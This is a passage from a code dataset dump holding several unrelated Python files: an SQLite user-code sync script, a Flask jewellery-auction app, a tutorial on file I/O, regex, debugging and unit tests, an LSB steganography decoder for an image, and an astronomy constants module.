exc_info=(exc_type, exc_value, exc_traceback))\r\n logging.info('END')\r\n\r\ndef main():\r\n now = time.localtime()\r\n year = now.tm_year\r\n month = now.tm_mon\r\n day = now.tm_mday\r\n\r\n logging.basicConfig(filename=f'logs/{year}_{month}_{day}_update_db.log',\r\n level=logging.DEBUG,\r\n format='%(asctime)s - [%(levelname)s] %(message)s',\r\n datefmt='%Y/%m/%d %H:%M:%S')\r\n\r\n sys.excepthook = handle_unhandled_exceptions\r\n\r\n logging.info('START')\r\n\r\n gs_data = gs.get_data()\r\n\r\n DATABASE = 'access.db'\r\n con = sqlite3.connect(DATABASE)\r\n con.execute('PRAGMA foreign_keys = ON')\r\n cur = con.cursor()\r\n\r\n query = 'SELECT * FROM users'\r\n cur.execute(query)\r\n res = cur.fetchall()\r\n db_users = {\r\n 'ids': [],\r\n 'names': []\r\n }\r\n for row in res:\r\n db_users['ids'].append(row[0])\r\n db_users['names'].append(row[1])\r\n\r\n query = \"\"\" SELECT codes.code, codes.user_id, users.name FROM codes\r\n INNER JOIN users ON codes.user_id = users.id \"\"\"\r\n cur.execute(query)\r\n res = cur.fetchall()\r\n db_codes = {\r\n 'codes': [],\r\n 'users_ids': [],\r\n 'users_names': []\r\n }\r\n for row in res:\r\n db_codes['codes'].append(row[0])\r\n db_codes['users_ids'].append(row[1])\r\n db_codes['users_names'].append(row[2])\r\n\r\n new_names = []\r\n for gs_name in gs_data['names']:\r\n if gs_name not in db_users['names']:\r\n new_names.append((gs_name,))\r\n if new_names:\r\n query = 'INSERT INTO users(name) VALUES (?)'\r\n cur.executemany(query, new_names)\r\n con.commit()\r\n\r\n diff_codes = []\r\n new_codes = []\r\n for gs_code, gs_name in zip(gs_data['codes'], gs_data['names']):\r\n if gs_code not in db_codes['codes']:\r\n new_codes.append((gs_code, gs_name))\r\n else:\r\n db_code_index = db_codes['codes'].index(gs_code)\r\n if gs_name != db_codes['users_names'][db_code_index]:\r\n diff_codes.append((gs_name, gs_code))\r\n\r\n if diff_codes:\r\n query = \"\"\" UPDATE codes SET user_id = users.id\r\n FROM (SELECT id FROM users WHERE name = ?) AS users WHERE code = ? \"\"\"\r\n cur.executemany(query, diff_codes)\r\n con.commit()\r\n\r\n if new_codes:\r\n query = 'INSERT INTO codes(code, user_id) SELECT ?, users.id FROM users WHERE name = ?'\r\n cur.executemany(query, new_codes)\r\n con.commit()\r\n\r\n old_codes = []\r\n for db_code in db_codes['codes']:\r\n if db_code not in gs_data['codes']:\r\n old_codes.append((db_code,))\r\n\r\n if old_codes:\r\n query = 'DELETE FROM codes WHERE code = ?'\r\n cur.executemany(query, old_codes)\r\n con.commit()\r\n\r\n ws_client.main()\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"NicoCassio/siemb_project","sub_path":"update_db.py","file_name":"update_db.py","file_ext":"py","file_size_in_byte":3349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36702402392","text":"from flask import Blueprint, render_template, request, session\nfrom .models import Item, Gemstone, Metal, Bid\nfrom .forms import ItemForm\nfrom . import db\n\n\ndef get_item():\n item = Item(\"Gold Amber Ring\", \"https://i.pinimg.com/474x/b0/dc/40/b0dc40f5a5bc0ae02e2ba0dafe7926de.jpg\",\n \"Talisa\", \"Ring\", \"MaryP\", 1, 2, 1992, \"$120.00\", \"$230.35\", \"3.5cm\", \"15g\", \"Good\", \"Worn twice to parties\")\n gem = Gemstone(\"Amber\", \"Gold Amber Ring\", 1, \"Rectangle\",\n \"Orange\", \"2cm\", \"1cm\", \"0.5cm\", \"5g\")\n gem2 = Gemstone(\"Amber\", \"Gold Amber Ring\", 2, \"Teardrop\",\n \"Orange\", \"0.5cm\", \"0.8cm\", \"0.5cm\", \"3g\")\n metal = Metal(\"Gold\", \"Gold Amber Ring\", \"Gold\",\n \"14k\", \"copper\", \"3.5cm\", \"1cm\", \"4g\")\n bid = Bid(\"nyne03\", \"Amber Pendant\", \"$144\", \"5/10/2020\")\n bid1 = Bid(\"Starlight28\", \"Amber Pendant\", \"$150\", \"8/10/2020\")\n bid2 = Bid(\"nyne03\", \"Amber Pendant\", \"$145\", \"12/10/2020\")\n item.set_items(item)\n item.set_gems(gem)\n item.set_gems(gem2)\n item.set_metals(metal)\n item.set_bids(bid)\n item.set_bids(bid1)\n item.set_bids(bid2)\n item1 = Item(\"Round Diamond Earrings\", \"https://dl.airtable.com/.attachments/c408c402b19d6d876560736bd9b85f68/2dd7dd7f/RoundDiamondEarrings.jpg\",\n \"Cartier\", \"Earrings\", \"cookieMonster789\", 1, 2, \"2016\", \"$330\", \"$299.00\", \"24mm\", \"12g\", \"Excellent\", \"Never worn. Perfect for functions.\")\n gem3 = Gemstone(\"Diamond\", \"Round Diamond Earrings\", 2,\n \"White\", \"Circle\", \"0.4cm\", \"0.4cm\", \"0.25cm\", \"4g\")\n metal1 = Metal(\"Sterling silver\", \"Round Diamond Earrings\",\n \"Silver\", 0, \"Silver\", \"12cm\", \"44mm\", \"10g\")\n item.set_items(item1)\n item1.set_gems(gem3)\n item1.set_metals(metal1)\n item2 = Item(\"Sapphire Crystal Ring\", \"https://dl.airtable.com/.attachments/5ed715bb5470acaf07fa8c3439c3de3d/949ebaab/SilverSapphireRing.jpg\",\n \"Wallace Bishop\", \"Ring\", \"cookieMonster789\", 1, 2, 2009, \"$287\", \"$311.50\", \"3cm\", \"50g\", \"Very Good\", \"Super sparkly, real crystals\")\n gem4 = Gemstone(\"Sapphire\", \"Sapphire Crystal Ring\", 1,\n \"Dark Blue\", \"Circle\", \"0.5cm\", \"0.5cm\", \"0.5cm\", \"4.5g\")\n gem5 = Gemstone(\"Crystal\", \"Sapphire Crystal Ring\", 24,\n \"White\", \"Circle\", \"1.5mm\", \"1.5mm\", \"1.5mm\", \"1g\")\n item.set_items(item2)\n item2.set_gems(gem4)\n item2.set_gems(gem5)\n item2.set_metals(metal1)\n item3 = Item(\"Silver Diamond Ring\", \"https://dl.airtable.com/.attachments/6548906181af2d117a18ce634b5d69df/d86a2199/SilverDiamondRing.jpg\",\n \"Tiffany & Co\", \"Ring\",\t\"Starlight28\", 1, 1, 2000, \"$239\", \"$264.00\", \"2.5cm\", \"32g\", \"Good\", \"Thin metal, small diamond\")\n gem6 = Gemstone(\"Diamond\", \"Silver Diamond Ring\", 1,\n \"White\", \"Circle\", \"2cm\", \"2cm\", \"1cm\", \"6g\")\n item.set_items(item3)\n item3.set_gems(gem6)\n item3.set_metals(metal1)\n item4 = Item(\"Gold Crystal Joint Bracelet\",\t\"https://dl.airtable.com/.attachments/e2656e7e37902f2ba1c0615544db0893/0a779932/GoldJointBracelet.jpg\",\n \"Cartier\", \"Bracelet\", \"CaseyLM\", 1, 2, 2014, \"$345\", \"$299.00\", \"7.8cm\", \"18g\", \"Very Good\", \"Worn 3 times\")\n gem7 = Gemstone(\"Amber\", \"Gold Crystal Joint Bracelet\",\t8,\n \"Orange\", \"Square\", \"1cm\", \"1cm\", \"0.5cm\", \"3g\")\n gem8 = Gemstone(\"Crystal\", \"Gold Crystal Joint Bracelet\", 5,\n \"White\", \"Circle\", \"4mm\", \"4mm\", \"4mm\", \"1g\")\n item.set_items(item4)\n item4.set_gems(gem7)\n item4.set_gems(gem8)\n item4.set_metals(metal)\n item5 = Item(\"Gold Drop Earrings\", \"https://dl.airtable.com/.attachments/85c26a6c8caf1e3a78d2fa59b0cc7b7b/db06debd/GoldDropEarrings.jpg\",\n \"Prouds\",\t\"Earrings\",\t\"MaryP\", 1, 0, 1998, \"$98\", \"$75.90\", \"2.4cm\", \"9g\", \"Good\", \"Long and dangly\")\n item.set_items(item5)\n item5.set_metals(metal)\n item6 = Item(\"Silver Rose Quartz Earrings\",\t\"https://dl.airtable.com/.attachments/dc5cfb44aa36648ceecc9135670cd926/c13c2be6/SilverRoseEarrings.jpg\",\n \"Michael Hill\", \"Earrings\", \"nyne03\", 1, 1, 2003, \"$120\", \"$94.50\", \"1.4cm\", \"5g\",\t\"Fair\", \"Very pretty, shines in the light\")\n gem9 = Gemstone(\"Rose Quartz\", \"Silver Rose Quartz Earrings\",\n 2, \"Pink\", \"Other Shape\", \"2cm\", \"2.4cm\", \"3mm\", \"2.2g\")\n item.set_items(item6)\n item6.set_gems(gem9)\n item6.set_metals(metal1)\n item7 = Item(\"Silver Geometric Pendant\", \"https://dl.airtable.com/.attachments/136d02d4e0500cd257838351dc9927e0/855cc15a/SilverGeometricPendant.jpg\",\n \"Pandora\", \"Pendant\", \"yyr84\", 1, 0, 1996, \"$99\", \"$108.95\", \"30cm\", \"14g\", \"Fair\", \"Very light to wear\")\n item.set_items(item7)\n item7.set_metals(metal1)\n item8 = Item(\"Amber Flower Earrings\", \"https://dl.airtable.com/.attachments/199e360752c5b82fddffff00e23e9645/0cc685a5/AmberFlowerEarrings.jpg\",\n \"Bvlgari\", \"Earrings\", \"Starlight28\", 1, 2, 1994, \"$124\", \"$102.00\", \"2cm\", \"15g\", \"Very Good\", \"Amazing!! 10/10. My daughter loved it\")\n gem10 = Gemstone(\"Amber\", \"Amber Flower Earrings\", 2,\n \"Orange\", \"Circle\", \"1.5cm\", \"1.5cm\", \"1cm\", \"4g\")\n gem11 = Gemstone(\"Amber\", \"Amber Flower Earrings\", 10,\n \"Orange\", \"Other Shape\", \"2.15cm\", \"1cm\", \"1cm\", \"4.5g\")\n item.set_items(item8)\n item8.set_gems(gem10)\n item8.set_gems(gem11)\n item8.set_metals(metal1)\n item9 = Item(\"Amethyst Flower Ring\", \"https://dl.airtable.com/.attachments/d1854ca617034993922ffc327a3f55b5/6a9934bf/GoldAmethystFlowerRing.jpg\",\n \"Dior\", \"Ring\", \"JamTam\", 1, 2, 2008, \"$420\", \"$250.90\", \"3.2cm\", \"27g\", \"Excellent\", \"Worn once, slightly heavy\")\n gem12 = Gemstone(\"Amethyst\", \"Amethyst Flower Ring\", 6,\n \"Purple\", \"Circle\", \"1.5cm\", \"1.5cm\", \"1cm\", \"4g\")\n gem13 = Gemstone(\"Pink Topaz\", \"Amethyst Flower Ring\", 4,\n \"Dark Pink\", \"Circle\", \"1cm\", \"1cm\", \"1cm\", \"3g\")\n item.set_items(item9)\n item9.set_gems(gem12)\n item9.set_gems(gem13)\n item9.set_metals(metal)\n item10 = Item(\"Rose Gold Butterfly Bracelet\", \"https://dl.airtable.com/.attachments/ace4cc960edd1bbb3ceddf54e8a0a080/17c5feb3/RoseGoldButterfly.jpg\", \"Tiffany & Co\",\n \"Bracelet\", \"LucyGooseyy\", 1,\t2, 2012, \"$225\", \"$294.50\",\t\"6.8cm\", \"19g\",\t\"Good\", \"Many of my friends complimented this bracelet whenever I wore it\")\n gem14 = Gemstone(\"Crystal\", \"Rose Gold Butterfly Bracelet\",\n 36, \"White\", \"Circle\", \"2mm\", \"2mm\", \"2mm\", \"0.5g\")\n gem15 = Gemstone(\"Peach Sapphire\", \"Rose Gold Butterfly Bracelet\",\n 1, \"Light Peach\", \"Oval\", \"2.5cm\", \"1cm\", \"1cm\", \"3.5g\")\n metal2 = Metal(\"Rose Gold\", \"Rose Gold Butterfly Bracelet\",\n \"Rose gold\", \"8k\", \"Copper\", \"12cm\", \"3mm\", \"22g\")\n item.set_items(item10)\n item10.set_gems(gem14)\n item10.set_gems(gem15)\n item10.set_metals(metal2)\n item11 = Item(\"Gold Triangular Earrings\", \"https://dl.airtable.com/.attachments/b9d21ac9445a677618d71f0a42efad56/c67d86ad/GoldTriangularEarrings.jpg\",\n \"Goldmark\", \"Earrings\", \"cookieMonster789\", 1, 0, 2017, \"$87\", \"$84.99\", \"0.7cm\", \"8g\", \"Fair\", \"Simple, but makes a statement\")\n item.set_items(item11)\n item11.set_metals(metal)\n return item\n\n\nbp = Blueprint('main', __name__)\n\n\n@bp.route('/')\ndef show():\n item = get_item()\n # item = Item.query.filter_by(ItemNo=id).first()\n return render_template('index/show.html', item=item)\n\n\n@bp.route('/watchlist/')\ndef watchlist(id):\n item = get_item()\n return render_template('watchlist/show.html', item=item)\n\n\n@bp.route('/item_details/')\ndef item_details(id):\n item = Item.query.filter_by(ItemNo=id).first()\n # item = get_item()\n return render_template('item_details/show.html', item=item)\n\n\n@bp.route('/list_item', methods=['GET', 'POST'])\ndef list_item():\n print('Method Type: ', request.method)\n form = ItemForm()\n if form.validate_on_submit():\n print('Item submitted')\n\n name = form.itemName.data\n pic = form.itemPicture.data\n brand = form.itemBrand.data\n itemtype = form.itemType.data\n metalamount = form.itemMetals.data\n gemamount = form.itemGemAmount.data\n year = form.itemYear.data\n starting = form.itemStartingPrice.data\n original = form.itemValuePrice.data\n size = form.itemSize.data\n weight = form.itemWeight.data\n cond = form.itemCondition.data\n desc = form.itemDescription.data\n\n # create new item in session\n new_item = Item(ItemName=name, Picture=pic, Brand=brand, ItemType=itemtype, MetalAmount=metalamount, GemAmount=gemamount, YrCreated=year, StartingPrice=starting, OriginalPrice=original, Size=size, Weight=weight, Condition=cond, Description=desc)\n db.session.add(new_item)\n\n # commit to db\n db.session.commit()\n return ''\n\n return render_template('list_item/show.html', form=form)\n\n\n@bp.route('/login', methods=['GET', 'POST'])\ndef login():\n session['email'] = request.values.get('email')\n return render_template('login.html')\n\n\n@bp.route('/logout')\ndef logout():\n if 'email' in session:\n session.pop('email', None)\n","repo_name":"Antifact/assignment3","sub_path":"auction/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22135476732","text":"import pathlib\nimport re\nimport pdb\nimport unittest\n\"\"\"\n Two types of files: text and binary\n file opening modes: r: read only; w: write only; a: append; b: binary; t:text; rb: default mode; r+: both reading and writing; w+: both reading and writing;a+: both appending and reading\n Regular Expressions:\n - [abc]: a set of characters you wish to match (a or b or c) examples: [a-c]:a or b or c; [0-38]: 0 or 1 or 2 or 3 or 8; [^abc]: any character except a or b or c\n - 'a..c': any two character between a and c (like abbc) examples: 'a.*b': any match starting with a and ending with b;\n - ^ma*n$: start with m and end with n\n - +: one or more occurrences\n - ?: zero or one occurrences\n - ab{2,4}c: at least 2 b, at most 4 b (like abbbc) examples: [0-9]{3}-[0-9]{7}: a phone number like 555-3123121\n - a|b: alternation (or operator)(includes a or b or both)\n - (): group sub-patterns examples: (a|b|c)xz: abxz, axz, cabxzsa\n python re functions: findall: return a list of matches; split: split by regex; sub: like replace in strings; search: first occurrence is returned as match object\n debugging with pdb: p: print value e.g: p __file__; n (next, like stay local): execute until next line and stay in current function; s(step, like step into): execute current line and stop in different function(if there is) \n ll: long list, list content of all function; l: print 11 line around current line(also l .); c: continue till next breakpoint; b(reak): set breakpoints; unt: execute until line number is smaller than current(or given) one \n display/undisplay: to watch value(s) of variables; w: print stack trace; \n Testing: 3 type of test result; 1- OK: passed the test, 2- FAIL: assertion error exception occured, 3- ERROR: an exception occured(other than AssertionError)\n \n\"\"\"\n\"\"\"File I/O\"\"\"\nfile1 = open(\"first.txt\", mode=\"w\", encoding=\"utf-8\")\n# print(\"is file1 writable:\",file1.writable())\nfile1.write(\"This is calling from file1\\n\")\n# print(\"no of file1:\",file1.fileno())\n# print(\"current position of file1 cursor:\",file1.tell())\nfile1.seek(5)\nfile1.write(\"was\")\n# print(\"is file1 readable:\",file1.readable())\n# print(file1.close())\nfile1 = open(\"first.txt\",mode=\"r\", encoding=\"utf-8\")\n# print(\"read file1:\",file1.read(), end=\"\")\nfile1.close()\nwith open(\"second.txt\",\"a+\",encoding=\"utf-8\") as file2: # no need to close\n file2.write(\"It is from file2, r u ready?\\n\")\n file2.seek(3,0) # second argument define starting point; 0 for beginning, 1 for current, 2 for end of file\n file2.write(\"was \") # didn't work\n file2.seek(0)\n # print(\"read file2:\",file2.read(5))\n # print(\"read file2:\",file2.readline(), end=\"\")\n # print(\"file2 name:\",file2.name)\n # print(\"is file2 closed:\",file2.closed)\n # print(\"file2 mode:\",file2.mode)\n # print(\"file2 encoding:\",file2.encoding)\n # print(\"file2 errors:\",file2.errors)\n # print(\"file2 newlines:\",file2.newlines, end=\"\")\n # print(\"file2 buffer:\",file2.buffer)\n\"\"\"pathlib module\"\"\"\n# print(pathlib.Path.cwd())\n# print(pathlib.Path.home())\n# print(pathlib.Path(\"/it/is/a/directory\"))\n# print(pathlib.Path.home() / \"It\" / \"is\" / \"also\" / \"a\" / \"directory\")\n# print(pathlib.Path.home().joinpath(\"It\", \"is\", \"also\", \"a\", \"directory\"))\npath = pathlib.Path.cwd() / \"testing.txt\"\npath2 = pathlib.Path.cwd() / \"2testing2.txt\"\nwith open(path,\"w\") as file1:\n file1.write(\"It is testing 1\\n\")\nwith path2.open(\"w\") as file2:\n file2.write(\"It is testing 2\\n\")\n# print(path.read_text(), end=\"\") # read as text\n# print(path2.read_bytes(), end=\"\") # read as binary\npath.write_text(\"I am adding to testing 1\\n\") # write as text\npath2.write_bytes(b\"I am adding to 2testing2\\n\") # write as binary\n# print(path2.read_bytes())\n# print(path2.read_text(), end=\"\")\n# print(path2.resolve()) # full directory\n# print(path.parent) # parent directory\n# print(path.parent == pathlib.Path.cwd()) # they are same because path is created as full directory\npath3 = pathlib.Path(\"abc.txt\")\n# print(path3.parent) # Attention !!!\n# print(path3.parent == pathlib.Path.cwd()) # they are not same because path3 is represented as .\n# print(\"name:\",path2.name)\n# print(\"stem:\",path2.stem)\n# print(\"anchor:\",path2.anchor)\n# print(\"drive:\",path2.drive)\n# print(\"parts:\",path2.parts)\n# print(\"root:\",path2.root)\n# print(\"suffix:\",path2.suffix)\n# print(\"as_uri:\",path2.as_uri())\n# print(\"as_posix:\",path2.as_posix())\n# print(\"as_posix:\",list(path2.parents))\n# print(list(pathlib.Path.cwd().glob(\"*.py\")))\npath4 = pathlib.Path.cwd() / \"file io files\"\nif path4.exists():\n # print(\"'File io files' is created\")\n pass\npath2.replace(path4)\n\"\"\"Regular Expressions\"\"\"\npattern = 'ac..ve{1}'\nstring = \"it is an acvivee program for activeveness and acsivedd\"\n# print(re.findall(pattern, string))\n# print(re.findall('a.', string))\n# print(re.split(\"ve\", string))\n# print((re.search(\"v\", string)))\n# print(re.search('[ab]', \"it is not truae\"))\n# print(re.search('[a-f,1-47]', \"it is no7t tru\"))\n# print(re.search('[a-f,1-47]', \"it is no7t tru\"))\n# print(re.search('..', \"it is not trnou\").span())\n# print(re.search('..', \"it is not trnou\").string)\n# print(re.search('..', \"it is not trnou\").re)\n# print(re.search('..', \"it is not trnou\").group())\n# print(re.match('^i', \"it is not trnou\"))\n# print(re.search('^i.*u$', \"it is not trnou\"))\n# print(re.findall('is*s', \"it is a good issf iss that doissz doiss\"))\n# print(re.split('is*s', \"it is a good issf iss that doissz doiss\"))\n# print(re.sub('is*s', \"doo\", \"it is a good issf iss that doissz doiss\"))\n# print(re.search('is*s', \"it is a good issf iss that doissz doiss\"))\n\"\"\"Debugging\"\"\"\n# breakpoint()\n# print(\"x\")\ndef f1():\n print(\"it is f1\")\n def f2():\n print(\"it is f2\")\n for _ in range(10):\n print(_, end=\"-\")\n def f3():\n print(\"it is f3\")\n f3()\n f2()\n# f1()\n# print(\"it is main\")\n\"\"\"Testing\"\"\"\ndef isitokay(a, b):\n c = a > b\n return c\ndef funcy(vava):\n\n raise TypeError if type(vava) != int else None\n\nclass Tester(unittest.TestCase):\n\n def test_1(self): # every test starting with test_ will run automatically\n # No need to call these test functions. Python will test if they start with test_\n\n val1 = 5; val2=\"0\"; expected = False\n # result = isitokay(val1, val2)\n # self.assertEqual(result, expected)\n self.assertRaises(TypeError, funcy, val2)\n def test_2(self):\n\n val1 = [1,2,3]; val2 = 4; expected = False\n result = isitokay(val1, val2)\n self.assertEqual(result, expected)\n self.assertTrue(not result)\n self.assertFalse(result)\n\nprint(re.findall(\"[0-9]{3}-[0-9]{7}\", \"531-0314929111-2131232\"))","repo_name":"dev7hka/My_Python_Tutorial","sub_path":"part4.py","file_name":"part4.py","file_ext":"py","file_size_in_byte":6788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25967623766","text":"# -*- coding:utf-8 -*-\nfrom PIL import Image\n\n\ndef mod(x, y):\n return x % y\n\n\ndef toasc(strr):\n return int(strr, 2)\n\n\n# le为所要提取的信息的长度,str1为加密载体图片的路径,str2为提取文件的保存路径\ndef func(le, str1, str2):\n a = ''\n b = ''\n im = Image.open(str1)\n lenth = le * 8\n width = im.size[0]\n height = im.size[1]\n count = 0\n for h in range(0, height):\n for w in range(0, width):\n # 获得(w,h)点像素的值\n pixel = im.getpixel((w, h))\n # 此处余3,依次从R、G、B三个颜色通道获得最低位的除\n if count % 3 == 0:\n count += 1\n b = b + str((mod(int(pixel[0]), 2)))\n if count == lenth:\n break\n if count % 3 == 1:\n count += 1\n b = b + str((mod(int(pixel[1]), 2)))\n if count == lenth:\n break\n if count % 3 == 2:\n count += 1\n b = b + str((mod(int(pixel[2]), 2)))\n if count == lenth:\n break\n if count == lenth:\n break\n with open(str2, \"wb\") as f:\n for i in range(0, len(b), 8):\n # 以每8位为一组二进制,转换为十进制\n stra = toasc(b[i:i + 8])\n # 将转换后的十注制数视为ascii码:再转换为字符中写入到文件中\n f.write(chr(stra).encode())\n stra = ''\n f.close()\n\n\n# 文件长度\nle = 30\n# 含有隐藏信息的图片\nnew = r\"tu_LSB1.png\"\n# 信息提取出后所存放的文件\ntiqu = r\"get_flag.txt\"\nfunc(le, new, tiqu)\n","repo_name":"wgf4242/text","sub_path":"docs/ctf/scripts/archive/LSB_decode.py","file_name":"LSB_decode.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"77"} +{"seq_id":"36223611907","text":"import numpy as np\n\n# Physical constants\ngrav_const = 4.*np.pi**2 # in AU^3 yr^-2 solar_mass^-1\nc = 2.998e8 / 1.496e11 * 365.25 * 24. * 60. * 60. # AU yr^-1\nplanck = 6.62608e-27\n\n# Data structure parameters\nmaxnplanets = 30\nmincomponents = 1 # Minimum number of disk components, warm dust / exo-zodi required\nmaxcomponents = 3 # Maximum number of disk components, highest plausible is 3-4.\n\n# File paths\nexovistapath = './'\nlqq_dir = 'lqq_files/'\n\n# Define debris disk grain sizes\n'''\nIf we did Mie theory on the fly using dustmap, we'd have to use\na LOT of different grain sizes to average over Mie ringing\nartifacts. Instead, we have pre-calculated Qabs and Qsca\nfor different grain size ranges (in lqq_files folder).\nHere is the master list of pre-calculated grain sizes we can\nselect from. I previously determined a size resolution ~ 5 was\nsufficient to accurately reproduce Qsca and Qabs for any distribution\nof grain sizes.\n'''\n\n# Variables used in theory to generate the dust filenames procedurally.\n'''\nsizeres = 5.\nmaster_maxsize = 1000.\nmaster_minsize = 0.1\ndlnsize = 1./sizeres\nmaster_lnmaxsize = np.log(master_maxsize)\nmaster_lnminsize = np.log(master_minsize)\nmaster_nsizes = int(np.ceil((master_lnmaxsize-master_lnminsize)/dlnsize))\n'''\n\n# Arrays needed to generate the exact dust filenames.\nmaster_rdust = np.array([0.1103, 0.1342, 0.1632, 0.1986, 0.2415, 0.2938, 0.3574, 0.4348, 0.5289, 0.6434, 0.7827, 0.9522, 1.1583, 1.4091, 1.7141, 2.0852, 2.5366, 3.0858, 3.7538, 4.5664, 5.5550, 6.7575, 8.2204, 10.0000, 12.1648, 14.7983, 18.0019, 21.8991, 26.6399, 32.4070, 39.4225, 47.9569, 58.3388, 70.9682, 86.3317, 105.0211, 127.7565, 155.4138, 189.0584, 229.9864, 279.7748, 340.3416, 414.0202, 503.6490, 612.6804, 745.3159, 906.6649])\n\nmaster_rdust_boundaries = np.array([0.1000, 0.1216, 0.1480, 0.1800, 0.2190, 0.2664, 0.3241, 0.3942, 0.4796, 0.5834, 0.7097, 0.8633, 1.0502, 1.2776, 1.5541, 1.8906, 2.2999, 2.7977, 3.4034, 4.1402, 5.0365, 6.1268, 7.4532, 9.0666, 11.0294, 13.4171, 16.3217, 19.8551, 24.1534, 29.3822, 35.7430, 43.4808, 52.8937, 64.3444, 78.2739, 95.2190, 115.8323, 140.9082, 171.4126, 208.5206, 253.6620, 308.5758, 375.3775, 456.6408, 555.4957, 675.7517, 822.0413, 1000.0001])\n\nmaster_nsizes = len(master_rdust_boundaries)\nmaster_drdust = master_rdust_boundaries[1:master_nsizes]-master_rdust_boundaries[0:master_nsizes-1]\n\n# Table headings\nstarbase = {'ID':0, 'HIP':0, 'TYC':'', 'dist':10., 'M_V':0., 'Vmag':0., 'Bmag':0., 'Umag':float('nan'), 'Rmag':float('nan'), 'Imag':float('nan'), 'Jmag':float('nan'), 'Hmag':float('nan'), 'Kmag':float('nan'), 'Type':'', 'Lstar':0., 'logg':0., 'Teff':0., 'angdiam':0., 'mass':0., 'rstar':0., 'RA':0., 'Dec':0., 'pmRA':0., 'pmDec':0., 'BmV':0., 'PA':0., 'I':60., 'Spectrum':None}\nalias = {'ID':'ID', 'HIP':'HIP', 'TYC':'TYC', 'dist':'dist', 'MV':'M_V', 'Vmag':'Vmag', 'Bmag':'Bmag', 'Umag':'Umag', 'Rmag':'Rmag', 'Imag':'Imag', 'Jmag':'Jmag', 'Hmag':'Hmag', 'Kmag':'Kmag', 'Type':'Type', 'SpT':'Type', 'Lstar':'Lstar', 'Lum':'Lstar', 'logg':'logg', 'Teff':'Teff', 'angdiam':'angdiam', 'mass':'mass', 'mstar':'mass', 'rstar':'rstar', 'rad':'rstar', 'RA':'RA', 'De':'Dec', 'pmRA':'pmRA', 'pmDe':'pmDec', 'BmV':'BmV', 'PA':'PA', 'Inc':'I', 'Spectrum':'Spectrum'}\nintlist = ['ID', 'HIP']\nstrlist = ['TYC', 'WDS', 'Type', 'Spectrum']\nkeplist = ('a','e','i','longnode','argperi','meananom')\npllabel = ('M','R','a','e','i','longnode','argperi','meananom')\ndlabel = ('n', 'longnode', 'i', 'nzodis', 'r', 'dror', 'rinner', 'eta', 'hor', 'g0', 'g1', 'g2', 'w0', 'w1', 'w2')\n\n# FITS file comments\nscomments = {'PA':'System midplane position angle (deg)',\n 'I':'System midplane inclination (deg)',\n 'ID':'Internal catalog #',\n 'HIP':'Hipparcos designation',\n 'TYC':'Tycho/Tycho-2 designation',\n 'dist':'Distance (pc)',\n 'Vmag':'Absolute V band mag',\n 'Type':'Spectral type',\n 'Lstar':'Bolometric luminosity (solar luminosities)',\n 'Teff':'Effective temperature (K)',\n 'angdiam':'Angular diameter (mas)',\n 'mass':'Mass (solar masses)',\n 'Rstar':'Radius (solar radii)'}\n\npcomments = {'M':'Mass (Earth masses)',\n 'R':'Radius (Earth radii)',\n 'a':'Semi-major axis (AU)',\n 'e':'Eccentricity',\n 'i':'Inclination (deg)',\n 'longnode':'Longitude of ascending node (deg)',\n 'argperi':'Argument of pericenter (deg)',\n 'meananom':'Mean anomaly (deg)'}\n\ndcomments = {'longnode':'longitude of ascending node (deg)',\n 'i':'inclination (deg)',\n 'nzodis':'exozodi level (zodis)',\n 'r':'peak density radius (AU)',\n 'dror':'Gaussian peak width',\n 'rinner':'truncation radius (AU)',\n 'eta':'T_PR/T_coll',\n 'hor':'scale height',\n 'g0':'HG scattering asym. parameter 1',\n 'w0':'HG function weight 1',\n 'g1':'HG scattering asym. parameter 2',\n 'w1':'HG function weight 2',\n 'g2':'HG scattering asym. parameter 3',\n 'w2':'HG function weight 3'}\n","repo_name":"alexrhowe/ExoVista","sub_path":"src/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":5170,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"27164176183","text":"import os\nfrom collections import namedtuple\nimport collections\nimport collections.abc\n\nimport json\n\n\nbase_config = {\n \"preprocess_config\":{\n \"sample_rate\":16000,\n \"origin_wavpath\": \"$BASE_PATH/../DATA/temp_data/temp_input\",\n \"target_wavpath\": \"$BASE_PATH/../DATA/temp_data/temp_out\",\n \"mc_dir\": \"$BASE_PATH/../DATA/temp_data/temp_mc\",\n \"num_workers\": None\n },\n \"npz_path\":\"$BASE_PATH/../DATA/temp_data/npz_files\",\n \"origin_wav_name\": \"$BASE_PATH/../DATA/temp_data/temp_input/temp_speaker/temp_speaker_source.wav\",\n \"speakers\" : [\"p262\", \"p272\", \"p229\", \"p232\", \"p292\", \"p293\", \"p360\", \"p361\", \"p248\", \"p251\", \"#蔡英文\", \"#韓國瑜\", \"#馬英九\"],\n \"speakers_image\":{\"#蔡英文\":\"$BASE_PATH/images/english.png\",\n \"#韓國瑜\":\"$BASE_PATH/images/fish.gif\",\n \"#馬英九\":\"$BASE_PATH/images/horse.jpeg\"},\n \"default_image\":\"$BASE_PATH/images/convict.jpg\",\n \"convert_config\" : {\n \"num_speakers\" : 10,\n \"num_converted_wavs\" : 1,\n \"resume_iters\" : 175000,\n \"src_spk\" : \"temp_speaker\",\n \"trg_spk\" : \"p262\",\n \"train_data_dir\":\"$BASE_PATH/../DATA/temp_data/temp_mc/\",\n \"test_data_dir\" :\"$BASE_PATH/../DATA/temp_data/temp_mc/\",\n \"wav_dir\" : \"$BASE_PATH/../DATA/temp_data/temp_out\",\n \"log_dir\" : \"./logs\",\n \"model_save_dir\" : \"$BASE_PATH/model_util/model_backend/models\",\n \"convert_dir\" : \"$BASE_PATH/model_util/converted\"\n }\n}\n\n\ndef replace_token_to_pwd(base_DICT, token):\n for k, v in base_DICT.items():\n if isinstance(v, collections.abc.Mapping):\n base_DICT[k] = replace_token_to_pwd(base_DICT.get(k, {}), token)\n elif isinstance(v, str):\n base_DICT[k] = v.replace(token, os.getcwd())\n else:\n pass\n return base_DICT\n \n\nif __name__ == \"__main__\":\n token = \"$BASE_PATH\"\n config = 